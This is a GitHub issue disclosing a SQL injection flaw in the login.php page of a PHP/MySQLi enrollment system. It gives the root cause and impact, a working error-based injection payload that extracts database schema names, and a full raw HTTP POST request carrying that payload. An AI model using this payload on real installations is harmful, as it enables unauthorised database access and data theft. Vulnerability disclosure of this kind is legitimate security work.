Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

SourceCodester CASAP Automated Enrollment System using PHP/MySQLi with Source Code login.php SQL injection #17

Open
1097hzy opened this issue Apr 22, 2024 · 0 comments
Open

SourceCodester CASAP Automated Enrollment System using PHP/MySQLi with Source Code login.php SQL injection #17

1097hzy opened this issue Apr 22, 2024 · 0 comments

Comments

@1097hzy
Copy link

1097hzy commented Apr 22, 2024

SourceCodester CASAP Automated Enrollment System using PHP/MySQLi with Source Code login.php SQL injection

NAME OF AFFECTED PRODUCT(S)

  • CASAP Automated Enrollment System using PHP/MySQLi with Source Code

Vendor Homepage

AFFECTED AND/OR FIXED VERSION(S)

submitter

  • Deng Shengke

Vulnerable File

  • login.php

VERSION(S)

  • V1.0

Software Link

PROBLEM TYPE

Vulnerability Type

  • SQL injection

Root Cause

  • The PHP method in the fourth line of the \Final\login.php file retrieves user input from the POST element. Then, the value of this element will be passed to the code without proper purification or validation, and ultimately used for database queries in the PHP method on line 21 of the \Final\login.php file. This may lead to SQL injection attacks.
  • 1

Impact

  • Attackers can exploit this vulnerability to gain database privileges, which can result in a large amount of data in the database. If the other party's database has DBA privileges, it may lead to server host privileges being obtained.

DESCRIPTION

  • Deng Shengke has discovered a serious issue in "CASAP Automated Enrollment System using PHP/MySQLi with Source Code" that can allow attackers to obtain large amounts of database content through SQL injection attacks.

Vulnerability details and POC

Payload

  • username=admin' OR ROW(5655,9136)>(SELECT COUNT(*),CONCAT(0x0a,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 18,1),0x0a,FLOOR(RAND(0)*2))x FROM (SELECT 7436 UNION SELECT 7676 UNION SELECT 1226 UNION SELECT 4614)a GROUP BY x)-- Opra&password=password
  • 3

Burp Suite (POC)

POST /login.php HTTP/1.1
Host: www.final.com:10001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 302
Origin: http://www.final.com:10001
Connection: close
Referer: http://www.final.com:10001/index.php

username=admin' OR ROW(5655,9136)>(SELECT COUNT(*),CONCAT(0x0a,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 18,1),0x0a,FLOOR(RAND(0)*2))x FROM (SELECT 7436 UNION SELECT 7676 UNION SELECT 1226 UNION SELECT 4614)a GROUP BY x)-- Opra&password=password
  • 2
  • Here is the MySQL database name obtained from the sqlmap attack
  • 4
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@1097hzy